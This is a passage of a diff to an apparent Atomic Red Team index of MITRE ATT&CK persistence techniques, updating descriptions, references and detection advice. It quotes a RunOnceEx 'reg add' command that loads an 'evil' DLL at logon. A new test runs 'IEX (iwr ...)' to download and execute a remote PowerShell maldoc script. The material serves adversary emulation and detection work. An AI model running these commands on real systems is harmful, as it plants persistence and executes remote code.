will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010) IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010) - IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) + IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) @@ -11978,15 +12300,15 @@ persistence: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-03-24T19:39:50.839Z' + modified: '2020-08-26T14:18:08.480Z' created: '2020-01-24T15:05:58.384Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator - SYSTEM x_mitre_detection: |- - Monitor for abnormal usage of the Glfags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) + Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. (Citation: Microsoft Dev Blog IFEO Mar 2010) Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) x_mitre_data_sources: @@ -12329,6 +12651,12 @@ persistence: - source_name: mitre-attack external_id: T1574.006 url: https://attack.mitre.org/techniques/T1574/006 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-640 + source_name: capec + url: https://capec.mitre.org/data/definitions/640.html - source_name: Man LD.SO url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved @@ -12358,7 +12686,7 @@ persistence: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-15T21:59:25.358Z' + modified: '2020-09-16T16:49:46.904Z' created: '2020-03-13T20:09:59.569Z' x_mitre_platforms: - Linux @@ -12371,7 +12699,7 @@ persistence: Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1574.006 atomic_tests: - name: Shared Library Injection via /etc/ld.so.preload @@ -12640,6 +12968,12 @@ persistence: - source_name: mitre-attack external_id: T1543.004 url: https://attack.mitre.org/techniques/T1543/004 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017. @@ -12686,11 +13020,11 @@ persistence: phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-25T22:27:49.609Z' + modified: '2020-09-16T15:46:44.130Z' created: '2020-01-17T19:23:15.227Z' x_mitre_data_sources: - File monitoring - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_effective_permissions: - root @@ -13841,62 +14175,55 @@ persistence: atomic_tests: [] T1574.007: technique: - id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 + created: '2020-03-13T14:10:43.424Z' + modified: '2020-09-16T16:56:34.583Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1574.007 + url: https://attack.mitre.org/techniques/T1574/007 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-38 + source_name: capec + url: https://capec.mitre.org/data/definitions/38.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Path Interception by PATH Environment Variable description: |- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line. The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. - name: Path Interception by PATH Environment Variable - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.007 - url: https://attack.mitre.org/techniques/T1574/007 - - external_id: CAPEC-capec - source_name: capec - url: https://capec.mitre.org/data/definitions/capec.html - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-20T22:02:40.983Z' - created: '2020-03-13T14:10:43.424Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - Process monitoring - - File monitoring + id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 + x_mitre_defense_bypassed: + - Application control + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true x_mitre_detection: |- Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_defense_bypassed: - - Application control + x_mitre_data_sources: + - Process monitoring + - File monitoring + x_mitre_contributors: + - Stefan Kanthak + x_mitre_platforms: + - Windows atomic_tests: [] T1574.008: technique: - created: '2020-03-13T17:48:58.999Z' - modified: '2020-03-26T20:03:27.496Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 description: |- Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. @@ -13914,9 +14241,9 @@ persistence: - source_name: mitre-attack external_id: T1574.008 url: https://attack.mitre.org/techniques/T1574/008 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-159 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/159.html - url: http://msdn.microsoft.com/en-us/library/ms682425 description: Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014. @@ -13932,6 +14259,16 @@ persistence: url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN description: Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:03:35.217Z' + created: '2020-03-13T17:48:58.999Z' x_mitre_platforms: - Windows x_mitre_contributors: @@ -13956,23 +14293,13 @@ persistence: atomic_tests: [] T1574.009: technique: - created: '2020-03-13T13:51:58.519Z' - modified: '2020-03-26T19:55:39.867Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern external_references: - source_name: mitre-attack external_id: T1574.009 url: https://attack.mitre.org/techniques/T1574/009 - - external_id: CAPEC-capec + - external_id: CAPEC-38 source_name: capec - url: https://capec.mitre.org/data/definitions/capec.html + url: https://capec.mitre.org/data/definitions/38.html - source_name: Microsoft CurrentControlSet Services url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services @@ -14000,7 +14327,17 @@ persistence: This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b - x_mitre_version: '1.0' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:05:23.755Z' + created: '2020-03-13T13:51:58.519Z' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_detection: |- Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. @@ -14176,9 +14513,9 @@ persistence: phase_name: persistence - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-07-01T18:23:25.002Z' + modified: '2020-10-21T01:26:31.804Z' created: '2020-07-01T18:23:25.002Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User @@ -14191,6 +14528,7 @@ persistence: - Linux - macOS - Windows + - Network atomic_tests: [] T1547.010: technique: @@ -14405,11 +14743,12 @@ persistence: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-05-19T21:22:38.174Z' + modified: '2020-10-22T16:35:54.740Z' created: '2019-11-13T14:44:49.439Z' x_mitre_platforms: - Linux - Windows + - Network x_mitre_data_sources: - VBR - MBR @@ -14426,13 +14765,125 @@ persistence: - Anti-virus - Host intrusion prevention systems - File monitoring - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_detection: |- Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014) x_mitre_is_subtechnique: false atomic_tests: [] + T1547.012: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.012 + url: https://attack.mitre.org/techniques/T1547/012 + - source_name: Microsoft AddPrintProcessor May 2018 + url: https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor + description: Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved + October 5, 2020. + - source_name: ESET PipeMon May 2020 + url: https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ + description: Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti + Group. Retrieved August 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Print Processors + description: "Adversaries may abuse print processors to run malicious DLLs during + system boot for persistence and/or privilege escalation. Print processors + are DLLs that are loaded by the print spooler service, spoolsv.exe, during + boot. \n\nAdversaries may abuse the print spooler service by adding print + processors that load malicious DLLs at startup. A print processor can be installed + through the AddPrintProcessor API call with an account that has + SeLoadDriverPrivilege enabled. Alternatively, a print processor + can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet + or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: + e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry + key that points to the DLL. For the print processor to be correctly installed, + it must be located in the system print-processor directory that can be found + with the GetPrintProcessorDirectory API call.(Citation: Microsoft + AddPrintProcessor May 2018) After the print processors are installed, the + print spooler service, which starts during boot, must be restarted in order + for them to run.(Citation: ESET PipeMon May 2020) The print spooler service + runs under SYSTEM level permissions, therefore print processors installed + by an adversary may run under elevated privileges." + id: attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T16:05:36.344Z' + created: '2020-10-05T13:24:49.780Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver or HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver as they pertain to print processor installations. + + Monitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious. + x_mitre_data_sources: + - Process monitoring + - Windows Registry + - File monitoring + - DLL monitoring + - API monitoring + x_mitre_contributors: + - Mathieu Tartare, ESET + x_mitre_platforms: + - Windows + atomic_tests: [] + T1542.004: + technique: + created: '2020-10-20T00:05:48.790Z' + modified: '2020-10-22T02:18:19.568Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc + description: |- + Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks) + + + ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect. + name: ROMMONkit + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1542.004 + url: https://attack.mitre.org/techniques/T1542/004 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + x_mitre_platforms: + - Network + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_detection: There are no documented means for defenders to validate the + operation of the ROMMON outside of vendor support. If a network device is + suspected of being compromised, contact the vendor to assist in further investigation. + x_mitre_permissions_required: + - Administrator + x_mitre_data_sources: + - File monitoring + - Netflow/Enclave netflow + - Network protocol analysis + - Packet capture + atomic_tests: [] T1037.004: technique: id: attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211 @@ -14675,6 +15126,14 @@ persistence: description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. source_name: Microsoft Run Key + - source_name: Microsoft Wow6432Node 2018 + url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry + description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data + in the Registry. Retrieved August 3, 2020. + - source_name: Malwarebytes Wow6432Node 2016 + url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ + description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved + August 3, 2020. - url: https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key description: Microsoft. (2018, August 20). Description of the RunOnceEx Registry Key. Retrieved June 29, 2018. @@ -14697,26 +15156,30 @@ persistence: Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. The following run keys are created by default on Windows systems: + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce - The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) + Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be used to set startup folder items for persistence: + * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders The following Registry keys can control automatic startup of services during boot: + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: + * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run @@ -14734,9 +15197,9 @@ persistence: phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-25T16:16:26.182Z' + modified: '2020-08-03T16:30:26.918Z' created: '2020-01-23T22:02:48.566Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -15211,10 +15674,58 @@ persistence: >$null 2>&1 ' + - name: Task Scheduler via VBA + auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 + description: | + This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within + 30 - 40 seconds after this module has run + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\") + \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" + -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" + name: powershell T1053: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:30:46.977Z' + modified: '2020-10-14T15:20:01.069Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scheduled Task/Job + description: |- + Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) + + Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). external_references: - source_name: mitre-attack external_id: T1053 @@ -15226,35 +15737,21 @@ persistence: description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016. source_name: TechNet Task Scheduler Security - description: |- - Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) - - Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). - name: Scheduled Task/Job - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:45:04.006Z' - created: '2017-05-31T21:30:46.977Z' - x_mitre_is_subtechnique: false - x_mitre_version: '2.0' - x_mitre_contributors: - - Prashant Verma, Paladion - - Leo Loobeek, @leoloobeek - - Travis Smith, Tripwire - - Alain Homewood, Insomnia Security - x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Windows + - Linux + - macOS + x_mitre_remote_support: true + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User x_mitre_detection: "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look @@ -15265,19 +15762,18 @@ persistence: part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement." - x_mitre_permissions_required: - - Administrator - - SYSTEM - - User - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_remote_support: true - x_mitre_platforms: - - Windows - - Linux - - macOS + x_mitre_data_sources: + - File monitoring + - Process monitoring + - Process command-line parameters + - Windows event logs + x_mitre_contributors: + - Prashant Verma, Paladion + - Leo Loobeek, @leoloobeek + - Travis Smith, Tripwire + - Alain Homewood, Insomnia Security + x_mitre_version: '2.0' + x_mitre_is_subtechnique: false atomic_tests: [] T1546.002: technique: @@ -15457,7 +15953,7 @@ persistence: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-04-17T17:47:57.075Z' + modified: '2020-09-16T19:34:19.961Z' created: '2019-06-28T17:52:07.296Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -15490,9 +15986,9 @@ persistence: - source_name: mitre-attack external_id: T1574.010 url: https://attack.mitre.org/techniques/T1574/010 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-17 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/17.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -15510,7 +16006,7 @@ persistence: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-26T19:37:28.912Z' + modified: '2020-09-16T19:10:04.262Z' created: '2020-03-12T20:43:53.998Z' x_mitre_contributors: - Travis Smith, Tripwire @@ -15545,9 +16041,9 @@ persistence: - source_name: mitre-attack external_id: T1574.011 url: https://attack.mitre.org/techniques/T1574/011 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-478 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/478.html - source_name: Registry Key Security url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. @@ -15598,7 +16094,7 @@ persistence: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:01:09.906Z' + modified: '2020-09-16T19:07:48.590Z' created: '2020-03-13T11:42:14.444Z' x_mitre_defense_bypassed: - Application control @@ -15960,10 +16456,7 @@ persistence: service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious - commands at recurring intervals, such as at system boot.(Citation: Anomali - Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: - Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: - acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries + commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories @@ -15977,6 +16470,12 @@ persistence: - source_name: mitre-attack external_id: T1543.002 url: https://attack.mitre.org/techniques/T1543/002 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html - source_name: 'Linux man-pages: systemd January 2014' url: http://man7.org/linux/man-pages/man1/systemd.1.html description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. @@ -15989,18 